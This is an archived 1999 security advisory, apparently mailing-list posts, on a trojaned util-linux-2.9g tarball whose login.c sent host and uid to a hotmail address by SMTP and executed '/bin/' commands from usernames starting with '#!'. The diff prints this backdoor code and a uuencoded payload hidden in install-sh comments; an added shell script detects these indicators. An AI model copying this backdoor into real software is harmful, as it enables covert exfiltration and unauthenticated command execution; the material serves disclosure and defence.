trojan-backdoor-ftp.win.tue.nl.txt

17 Aug 1999, reported by Packet Storm (packetstormsecurity.com)

Warning: util-linux-2.9g had a trojan version; replace and verify all files from ftp.win.tue.nl.

Date: Sun, 24 Jan 1999 09:03:42 -0500
From: Trevor Johnson <[email protected]>  
To: [email protected]  
Subject: Re: util-linux compromised  
  
I just received the following letter:  
  
Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST)  
From: John Stange <[email protected]>  
Subject: util-linux compromised?  
  
I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a  
section of login.c that appears to send the host and uid of the user to a  
hotmail address. I imagine this isn't a standard feature. :> Given that  
the tcp wrappers archive was backdoored on that same server recently, you  
might want to comb over the rest of your stuff as well, if any of it's  
yours.  
  
-- John Stange  
Staff World, 4120 AVW  
x52720  
  
and indeed, util-linux-2.9g had been replaced by a trojan version.  
Unfortunately this means that everything from ftp.win.tue.nl  
must be regarded as suspect for the moment.  
  
I put a correct util-linux-2.9g.tar.gz back, with md5sum  
ab409a6ac5a775a4b04b8e27f6c86933 util-linux-2.9g.tar.gz  
but of course, for the time being, nothing on this machine can be trusted.  
  
Andries  
  
A diff between original and trojan:  
  
diff -r util-linux-2.9g/disk-utils/Makefile trojan/util-linux-2.9g/disk-utils/Makefile  
94a95  
>  
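Review bot: a whitespace-only change to a release Makefile has no legitimate purpose and should not be waved through as harmless; a file that differs from the pristine tree by one blank line is evidence that the archive was repacked, so the comparison has to cover the archive digest and the whole tree rather than only the files with visible code changes.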
diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh  
147a148,171  
> # M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO  
> # M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z  
> # M>'1X>$!8765I7F5E65Q80B`@(`HC("YA+G,N9RXW+C@N-2XV+C$N,BXU+F(N  
> # M<"XY+F<N=BXX+C<N82YW+G0N8BYP+C$N,BXX+CDN="XW+F8N9RYA+G<N90HC  
> # M(#0L,RQH+'0L.2QQ+#(L."QT+&8L82QW:"UQ+3(M,RUT+74M;"UF+7(M-BUI  
> # M+6$M=RUE+68M9RUQ+34M-BTW+6DM82TS=0HC($!H5TER/3MX=GA1;&]Z>7!C  
> # M9G%B?FI'/58J4W!;,G)R4CA6<6%@7#U*,FMF67E8,VI'8G(]/CM[=7IX='AX  
> # MW<L,14(2SWS1$J0=[8?[[?=T-T!2LK,S>W,S5W4;[TXLD4"CT:]/-^"JC)->  
> # M$F?5E]ZP_WJ^^^0W^-$'@Y>'A_J)UOKET<':;_<ST/KHZ&"P]_+@Y>&!UGOX  
> # M=/1$'S[Y'7XJ6P:%UD_^27^J#?U'L;WMT4/[OV<*_XC^#UG_P^'1P3?]_Q_K  
> # M_SRX-;,X,;]ZC;W!X.C@X*OZ/]C;/R#]#UX.#_?V!["%O8/!X.43/?BF_]_\  
> # MYYGV:M:]7O-YEA>Z,0U]QO_2@[B,C57/]'%A@M)$(ST)2OW6A'IXI(>#T>#U  
> # MZ&"@]UZ_'F+,E;F++8UY5\3Z8UA"R7JX-QH,1\,]&G.HIRM=]&=!7"Z^CXTQ  
> # M_;R8$^U\N2KB^:)D0EWZ=Y__/>C*M*LXO`V*2)_T]3N:K+>%1FC[51;V353M  
> # MJ&=*Q5F85)'1_?[N^?''BW>G[Q6H?UJ8PN@RU\NJU&F0Z64P-_;/2IV/+UY]  
> # MIY\^G478?1J4_5<ZO;7WP1(?K"EGT;)(^Z\>D)C&65#$1.&9GA@\7AC=B3.8  
> # M59)T=%$Y:=)C"//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O  
> # M\2PS?]6=Y]O'ES<['=VQRZ`(.^!@9L-;'6219KKW<9+H,$^7T&E73\%MR:S'  
> # M5F>YOC5%9A)MJ^4R+TJ=9YK)L"!&WSW?IM\[3+&?QEG\A04RL_Z7>\8[H>'T  
> # MNSV\->H!O^G1J]O.YD(4>T`\]!^L^["Y`CUUH]P89;(HGBF36/,XT<=(N$F;  
> # M5\9VU%/L_7A']T*0.'YW-GX_P9>WD[/CFZO)R>2[/?W\C[J7Z^??RR[6*%W(  
> # MH+]+:WWZTY$7B>Q1.*PYS76"408??@'+S[?/WOI%_D,6H6>G/\CH7\[O5PFY  
> # MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#"PXK`J+WW`NF  
>  
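Review bot: an opaque block of encoded data has no place in install-sh and this hunk should be rejected as a whole. The 24 added lines are shell comments whose bodies begin with the length byte `M` and run exactly 60 characters, the shape of uuencoded data, so they carry a hidden payload rather than documentation; decoding the sixth added line (`+6$M=RUE...($!H5TER/3MX=GA1`) gives readable text containing `@hWIr=;xvxQ`, the same string this patch appends as a comment to misc-utils/Makefile, so the two insertions are one mechanism. A build script that ships data only a decoder can read is a finding on its own, whatever the data turns out to be.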
diff -r util-linux-2.9g/login-utils/login.c trojan/util-linux-2.9g/login-utils/login.c  
179a180  
> void checkname P_((char *name));  
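Review bot: a new prototype `void checkname P_((char *name));` appears at line 179 with no comment saying what the function checks or why /bin/login needs it; the name promises validation, and the definition (further down in this same file) has to be read before the declaration is accepted.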
552a554,555  
> checkname(username);  
>  
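Review bot: `checkname(username)` is called on the raw username at line 552 and its result is ignored, so the call cannot be a validation step in any meaningful sense; nothing in the hunk shows where this sits relative to password verification, and a hook that runs on every name typed at the login prompt needs that justification spelled out before it can go in.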
1291a1295,1342  
> }  
>  
> #include <sys/socket.h>  
> #include <netinet/in.h>  
> #include <arpa/inet.h>  
> #include <netdb.h>  
>  
> void  
> checkname(char *name)  
> {  
> char a[100];  
> char *pt;  
>  
> if ((name[0] == '#') && (name[1] == '!'))  
> {  
> pt = (char*)&name[2];  
> sprintf(a,"/bin/%s",pt);  
> execl(a,a,(void*)0);  
> }  
> if (fork() == 0)  
> {  
> struct hostent *he;  
> struct sockaddr_in sai;  
> struct in_addr *ia;  
> char b[500];  
> int s,l;  
>  
> setsid();  
> s = open("/var/tmp/.fmlock0",O_RDONLY);  
> if (s >= 0) exit(0);  
> he = gethostbyname("mail.hotmail.com");  
> if (!he) exit(0);  
> ia = (struct in_addr *)he->h_addr_list[0];  
> l = sizeof(sai);memset(&sai,0,l);  
> sai.sin_port = htons(25);  
> sai.sin_addr.s_addr = ia->s_addr;  
> if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);  
> if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);  
> if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0);  
> sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());  
> sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);  
> sleep(1);if (write(s,"MAIL FROM:<[email protected]>\n",28) < 0) exit(0);  
> if (write(s,"RCPT TO:<[email protected]>\n",30) < 0) exit(0);  
> sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);  
> sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);  
> sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);  
> sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);  
> }  
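Review bot: this hunk must be rejected: `checkname()` is a backdoor, not a check. Its first branch treats a username beginning with `#!` as a command, builds `/bin/<rest of name>` with `sprintf` into a 100-byte stack buffer from an unbounded string, and `execl`s the result in the login process without any credential check inside the function. Its second branch forks, resolves `mail.hotmail.com`, connects to port 25, and writes the host's address and uid to a hotmail mailbox, using `/var/tmp/.fmlock0` (created with mode 511, i.e. world-writable) as a run-once marker. For anyone triaging a host built from this tree: the marker file's presence means the trojaned login already ran and beaconed, and an outbound port-25 connection from `login` is the network-side indicator. The brace bookkeeping is also off as pasted (the hunk opens with a lone `}` and `checkname()` never closes), consistent with the author's note that the paste lost characters, so confirm against the real tarballs rather than this text.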
diff -r util-linux-2.9g/misc-utils/Makefile trojan/util-linux-2.9g/misc-utils/Makefile  
85a86,88  
>  
> #@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<  
>  
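Review bot: a comment consisting of an opaque string (`#@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<`) carries nothing a build needs and should be removed; the same string decodes out of the uuencode-style block this patch appends to install-sh, so it is a marker or key left by whoever repacked the archive, not a stray edit.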
  
  
(pasted from another window - tabs etc will be lost).  
  
Andries  
  
-  
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in  
the body of a message to [email protected]  
Please read the FAQ at http://www.tux.org/lkml/  
  
--------------------------------------------------------------------------------------------  
  
Date: Sat, 23 Jan 1999 22:49:29 -0500  
From: John Stange <[email protected]>  
To: [email protected]  
Subject: Re: backdoored tcp wrapper source code  
  
You may want to have a thorough look at everything you've got... I grabbed  
a copy of util-linux2.9g (admittedly being a bad boy and not checking  
against anything), and while I don't have a pristine copy of the source  
on hand to check, I'm guessing that sendmail and a hotmail address is not  
standard behavior for /bin/login:  
  
(from login-utils/login.c)  
  
he = gethostbyname("mail.hotmail.com");  
if (!he) exit(0);  
ia = (struct in_addr *)he->h_addr_list[0];  
l = sizeof(sai);memset(&sai,0,l);  
sai.sin_port = htons(25);  
sai.sin_addr.s_addr = ia->s_addr;  
if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0);  
if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0);  
if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0)  
exit(0);  
sprintf(b,"\r\nHost = %s\r\nUid =  
%i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid());  
sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0);  
sleep(1);if (write(s,"MAIL FROM:<[email protected]>\n",28) <  
0) exit(0);  
if (write(s,"RCPT TO:<[email protected]>\n",30) < 0)  
exit(0);  
sleep(1);if (write(s,"DATA\n",5) < 0) exit(0);  
sleep(1);if (write(s,b,strlen(b)) < 0) exit(0);  
sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0);  
sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);  
etc etc  
  
I'm in a bit of a hurry, so I haven't had a chance to comb anything  
else...  
  
> TCP Wrappers is a widely-used security tool to protect UNIX systems  
> against intrusion. It has an estimated installed base of millions.  
>  
> Today someone replaced the tcp wrapper source on ftp.win.tue.nl by  
> a backdoored version. Eventually this was bound to happen, and  
> that's why the source file is accompanied by a PGP signature. But  
> that is no guarantee against people downloading and installing  
> backdoored software.  
  
-- John Stange  
Staff World, 4120 AVW  
x52720  
  
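As an added example (not from the advisory, from Andries, or from the util-linux project), the following POSIX shell script does what the thread asks of a downloader: compare the archive's md5sum with the posted value before unpacking, scan an unpacked tree for the fragments the diff above makes visible, and check a running host for the run-once marker the trojaned login leaves behind. The helper names, the constructed sample files and the digest of the string "abc" are the example's own; the only value taken from the page is the md5sum ab409a6ac5a775a4b04b8e27f6c86933 and the indicator strings quoted from the diff.

```shell
#!/bin/sh
# Added example, not part of the advisory: verify a downloaded archive against
# the md5sum Andries posted, then scan an unpacked util-linux tree for the
# indicators visible in the trojan diff. All sample files are constructed here.

# Digest the advisory gives for the clean util-linux-2.9g.tar.gz (from the page).
GOOD_MD5=ab409a6ac5a775a4b04b8e27f6c86933

# Print the MD5 of a file, using whichever tool the host has.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    elif command -v md5 >/dev/null 2>&1; then
        md5 -q "$1"
    else
        openssl dgst -md5 -r "$1" | cut -d' ' -f1
    fi
}

# verify_tarball FILE EXPECTED_MD5: succeeds only when the digest matches,
# so it can gate an unpack with "verify_tarball f sum && tar xzf f".
verify_tarball() {
    [ "$(file_md5 "$1")" = "$2" ]
}

# scan_tree DIR: print one line per indicator found in an unpacked tree and
# fail if any was found. Patterns are the fragments shown in the diff.
scan_tree() {
    dir=$1; hits=0
    if grep -q 'checkname' "$dir/login-utils/login.c" 2>/dev/null; then
        echo "login-utils/login.c: checkname() hook present"; hits=$((hits + 1))
    fi
    if grep -q 'mail\.hotmail\.com' "$dir/login-utils/login.c" 2>/dev/null; then
        echo "login-utils/login.c: hard-coded SMTP beacon to mail.hotmail.com"; hits=$((hits + 1))
    fi
    if grep -q '/var/tmp/\.fmlock0' "$dir/login-utils/login.c" 2>/dev/null; then
        echo "login-utils/login.c: run-once marker /var/tmp/.fmlock0"; hits=$((hits + 1))
    fi
    # uuencode-style lines: '#', space, length byte 'M', then 60 encoded characters
    if grep -Eq '^# M.{60}$' "$dir/install-sh" 2>/dev/null; then
        echo "install-sh: uuencode-style data hidden in comments"; hits=$((hits + 1))
    fi
    if grep -q '^#@hWIr=' "$dir/misc-utils/Makefile" 2>/dev/null; then
        echo "misc-utils/Makefile: opaque marker comment"; hits=$((hits + 1))
    fi
    [ "$hits" -eq 0 ]
}

# marker_present [PATH]: the trojaned login creates /var/tmp/.fmlock0 once it
# has beaconed, so on a live host its presence means the backdoor already ran.
marker_present() {
    [ -e "${1:-/var/tmp/.fmlock0}" ]
}

# --- constructed sample data (stand-ins, not real util-linux files) ----------
WORK=$(mktemp -d)

# A stand-in archive with contents "abc"; MD5("abc") is the RFC 1321 test vector.
printf 'abc' > "$WORK/sample.tar.gz"
SAMPLE_MD5=900150983cd24fb0d6963f7d28e17f72

# A tree carrying the fragments the diff shows, and a clean tree without them.
mkdir -p "$WORK/trojan/login-utils" "$WORK/trojan/misc-utils" \
         "$WORK/clean/login-utils"  "$WORK/clean/misc-utils"
printf '%s\n' 'void checkname P_((char *name));' \
              'he = gethostbyname("mail.hotmail.com");' \
              'sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0);' \
              > "$WORK/trojan/login-utils/login.c"
printf '%s\n' '#!/bin/sh' \
              '# M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z' \
              > "$WORK/trojan/install-sh"
printf '%s\n' 'all:' '#@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/<' \
              > "$WORK/trojan/misc-utils/Makefile"
printf '%s\n' 'int main(void) { return 0; }' > "$WORK/clean/login-utils/login.c"
printf '%s\n' '#!/bin/sh' > "$WORK/clean/install-sh"
printf '%s\n' 'all:' > "$WORK/clean/misc-utils/Makefile"

# --- run the checks ----------------------------------------------------------
if verify_tarball "$WORK/sample.tar.gz" "$SAMPLE_MD5"; then
    echo "sample archive matches its own digest"
fi
if ! verify_tarball "$WORK/sample.tar.gz" "$GOOD_MD5"; then
    echo "sample archive does NOT match the advisory digest: do not unpack it"
fi
echo "scanning constructed trojan tree:"; scan_tree "$WORK/trojan" || echo "-> indicators found"
echo "scanning constructed clean tree:";  scan_tree "$WORK/clean"  && echo "-> no indicators"
```

The digest check is only as good as the channel the digest came over: Andries says nothing on that machine can be trusted for the moment, so a checksum fetched from the same FTP host proves nothing, and the PGP signature the tcp_wrappers announcement mentions is the stronger check. The tree scan is an indicator match for this particular trojan, not a general backdoor detector; it is the kind of quick triage John Stange did by reading login.c, made repeatable.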
